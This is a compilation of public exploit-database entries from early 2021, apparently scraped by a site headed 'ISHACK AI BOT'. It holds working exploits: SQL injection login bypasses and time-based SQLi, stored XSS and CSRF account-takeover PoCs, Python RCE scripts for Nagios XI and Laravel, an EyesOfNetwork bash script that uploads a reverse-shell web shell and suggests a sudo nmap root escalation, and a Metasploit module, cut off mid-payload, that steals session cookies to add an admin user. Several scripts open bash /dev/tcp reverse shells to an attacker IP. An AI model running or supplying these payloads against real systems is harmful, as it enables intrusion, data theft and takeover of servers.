ISHACK AI BOT

# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/marimar/admin/index.php Host: TARGET POST /marimar/admin/login.php HTTP/1.1 Content-Length: 57 Connection: close Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616 email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=

# Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) # Date: 19/12/2020 # Exploit Author: Haboob Team (https://haboob.sa) # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Version: Nagios XI 5.7.x # Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM # CVE: CVE-2020-35578 #!/usr/bin/python3 # pip3 install bs4 lxml import requests import sys import warnings from bs4 import BeautifulSoup import base64 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port") print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def login(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[0].get('value') print("[+] Extract login nsp token : %s" % nsp_str) # Login login_info = { "nsp": nsp_str, "pageopt": "login", "username": username, "password": password } login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False) login_text = login_request.text # Check Login Status if "Core Config Manager" in login_text: return True else: print("[-] Login ... Failed!") return False def execute_payload(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) print("[+] Request upload form ...") nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[1].get('value') print("[+] Extract upload nsp token : %s" % nsp_str) # Payload Base64 Encoding payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) payload_bytes = payload_decoded.encode('ascii') base64_bytes = base64.b64encode(payload_bytes) payload_encoded = base64_bytes.decode('ascii') payload = ";echo " + payload_encoded + " | base64 -d | bash;#" print("[+] Base64 encoded payload : %s" % payload) # Payload Execution multipart_form_data = { 'upload': (None, '', None), 'nsp': (None, nsp_str, None), 'uploadedfile': (payload, 'whatever', 'text/plain'), 'convert_to_unix': (None, '1', None), } print("[+] Sending payload ...") print("[+] Check your nc ...") rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False) if login(): print("[+] Login ... Success!") execute_payload()

# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/onlinemovies/Plogin.php POST /onlinemovies/Plogin.php HTTP/1.1 Host: TARGET Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://TARGET Connection: close Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj Upgrade-Insecure-Requests: 1 mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=

# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection # Date: 14.1.2021 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested on: Kali Linux Use SQLMAP: sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3

# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) # Date: 2020-12-21 # Exploit Author: Mohamed Oosman B S # Vendor Homepage: https://www.php-fusion.co.uk/ # Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php # Version: 9.03.90 and below # Tested on: Windows 10 # CVE : CVE-2020-35687 1. Description: PHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. 2. Proof of Concept As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, after getting to know the shout_id of the message, as it is sequential. <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php"> <input type="hidden" name="s&#95;action" value="delete" /> <input type="hidden" name="shout&#95;id" value="3" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution # Date: 1.14.2021 # Exploit Author: SunCSR Team # Vendor Homepage: https://laravel.com/ # References: # https://www.ambionics.io/blog/laravel-debug-rce # https://viblo.asia/p/6J3ZgN8PKmB # Version: <= 8.4.2 # Tested on: Ubuntu 18.04 + nginx + php 7.4.3 # Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce #!/usr/bin/env python3 import requests, sys, re, os header={ "Accept": "application/json" } data = { "solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\ "parameters":{ "variableName":"cm0s", "viewFile":"" } } def clear_log(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass requests.post(url=url, json=data, headers=header, verify=False) requests.post(url=url, json=data, headers=header, verify=False) def create_payload(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text: return True return False def convert(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 200: return True return False def exploited(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 500 and 'cannot be empty' in resp.text: m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text) print() print(m[0][1]) def generate_payload(command='', padding=0): if '/' in command: command = command.replace('/', '\/') command = command.replace('\'', '\\\'') os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt'''%(command)) payload = '' with open('payload.txt', 'r') as fp: payload = fp.read() payload = payload.replace('==', '=3D=') for i in range(padding): payload += '=00' os.system('rm -rf payload.txt') return payload def main(): if len(sys.argv) < 4: print('Usage: %s url path-log command\n'%(sys.argv[0])) print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0])) exit(1) if not os.path.isfile('./phpggc/phpggc'): print('Phpggc not found!') print('Run command: git clone https://github.com/ambionics/phpggc.git') os.system('git clone https://github.com/ambionics/phpggc.git') url = sys.argv[1] path_log = sys.argv[2] command = sys.argv[3] padding = 0 payload = generate_payload(command, padding) if not payload: print('Generate payload error!') exit(1) if 'http' not in url and 'https' not in url: url = 'http'+url else: url = url+'/_ignition/execute-solution' print('\nExploit...') clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) create_payload(url, 'AA') create_payload(url, payload) while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))): clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) create_payload(url, 'AA') padding += 1 payload = generate_payload(command, padding) create_payload(url, payload) exploited(url, 'phar://%s'%(path_log)) if __name__ == '__main__': main()

# Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The room 'description' parameter is vulnerable to stored Cross-site Scripting. ######## Proof of Concept ######### Login with administrator credentials at http://localhost/admin with admin:admin and click on "Rooms" tab. Edit "description" parameter: 1<script>alert('document.cookie')</script> Any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.

# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) # Date: 14/01/2021 # Exploit Author: Rahul Ramakant Singh # Vendor Homepage: https://ghozylab.com/plugins/ # Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ # Version: 1.1.7 # Tested on Windows Steps: 1. Install WordPress 5.6 2. Install and activate *Contact Form Plugin* plugin. 3. Go to * Contact Form Plugin *plugin section and click on the add new form button. 4. Fill all required details and click on the save button and capture the request in a proxy tool like burp suite. 6. Append the JavaScript payload in the "Email Header" field as mentioned below *"<sc><svg/onload=alert(454)>"* 5. You will observe that the payload successfully got stored and reflected into the response and the malicious JavaScript payload got executed successfully and we are getting a pop-up.

# Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## Vulnerable to SQL Injection. // vulnerable parameter at include/room.php, line 25: $mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1"); ######## Proof of Concept ######### The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection. Payload: (select*from(select(sleep(10)))a) Proof of Concept: http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)

# Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## Vulnerable to Cross-site request forgery (CSRF), can lead to full account takeover of Administrator account. ######## Proof of Concept ######### Send the victim the following PoC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/marimar/admin/mod_users/controller.php?action=edit" method="POST"> <input type="hidden" name="USERID" value="1" /> <input type="hidden" name="UNAME" value="Anonymous" /> <input type="hidden" name="USERNAME" value="admin" /> <input type="hidden" name="deptid" value="" /> <input type="hidden" name="UPASS" value="admin" /> <!-- change this to the new password you wish --> <input type="hidden" name="ROLE" value="Administrator" /> <input type="hidden" name="deptid" value="" /> <input type="hidden" name="PHONE" value="912852478" /> <input type="hidden" name="save" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The 'person' parameter is vulnerable to time-based SQL Injection. ######## Proof of Concept ####### Payload: (select*from(select(sleep(10)))a) Using Burp Suite, send the following POST request: POST /marimar/index.php?p=booking HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/marimar/index.php?p=booking Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc Upgrade-Insecure-Requests: 1 arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0

# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution # Date: 10/01/2021 # Exploit Author: Ariane.Blow # Vendor Homepage: https://www.eyesofnetwork.com/en # Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso # Version: 5.3-10 (12/9/2020-lastest) #!/bin/bash # (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\ ############################################### # (Authentified) # # Abritraty file upload # # It whase a Challenge to do that in BASH # # But the exploit's working fine ! # # ........... # # Exploit is working with the actual version # # Scripted on 01/10/2021 # # By Ariane.Blow # # https://ariane.agency/ # ############################################### banner() { clear echo " ,*-." echo ' | |' echo ' ,. | |' echo ' | |_| | ,.' echo ' `---. |_| |' echo ' | .--`' echo " | |" echo " | |" echo ""Ω echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !" echo "" echo " EyesOfNetwork 5.3-10" echo "" echo " RedTeam Tool" echo "" echo " Input verification desertion" echo "" echo " RCE via Arbitrary FileUpload" echo "" echo "" } VAR() { #var #Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD ! mkdir /tmp/EON53 cd /tmp/EON53 #you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9) export filename=shell$random.xml.php echo "EyesOfNetwork IP :" read eonIP echo "HackerIP (used to start the listener) :" read hackerIP echo "Hacker PORT (used to start the listener):" read PORT echo "Username (default = admin) :" read username echo "password :" read password } #Getting the session_id GetSessionID() { echo "getting sessionID ... " echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh chmod +x GetSession.sh sessionID=$(./GetSession.sh) echo "sessionID acquired : $sessionID" sleep 3 echo } #start listener start_listen() { printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n" echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script" echo "sudo nmap --script=/tmp/nmap.script" printf "\e[31;1m ... I Know ... \e[0m \n" echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh chmod +x listen.sh ./listen.sh } #POST payload Payload() { echo "Sending PostRequest ..." echo "curl -i -s -k -X $'POST' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ --data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a<?php\x0d\x0aexec(\"/bin/bash -c \'bash -i > /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \ $'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh chmod +x req.sh ./req.sh } #Get request on PHP exploit Req_payload() { echo "Get request on the PHP payload ..." echo "curl -i -s -k -X $'GET' \ -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \ -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ $'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh chmod +x reqGET.sh ./reqGET.sh } #Clearing Clear_cache() { echo "clearing cache" rm listen.sh rm req.sh rm reqGET.sh rm GetSession.sh cd .. rmdir EON53 } #MAIN banner VAR GetSessionID start_listen Payload Req_payload Clear_cache

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , 'Description' => %q{ This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, can be performed without the need for any session(cookie) information. Therefore, the session cookie informations of the active users in the application can be read from the response content. A new authorized user can be created with the obtained cookie. }, 'References' => [ [ 'CVE', '' ], [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], [ 'URL', 'https://www.netsia.com' ] ], 'Author' => [ 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus ], 'License' => MSF_LICENSE, 'DisclosureDate' => "2021-01-06", 'DefaultOptions' => { 'SSL' => true } )) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [true, 'The username for your new account']), OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) ]) end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end def check begin res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) rescue return Exploit::CheckCode::Unknown end if res.code == 200 and res.body.include? 'sessionId' return Exploit::CheckCode::Vulnerable else if res.code == 200 and res.body.include? 'SUCCESS' print_status("Target is vulnerable! But active admin session was not found. Try again later.") return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe end def count_user(data, find_string) data.scan(/(?=#{find_string})/).count end def run unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) sescount = count_user(res.body,'"name"') print_good("Currently #{sescount} active sessions have been detected.") cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) puts cookies $i = 0 while $i <= sescount do sessloop = cookies[$i] sessid = "SESSION=" + sessloop.to_s cookie = sessid.split('"]').join('').split('["').join('') $i +=1 json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": 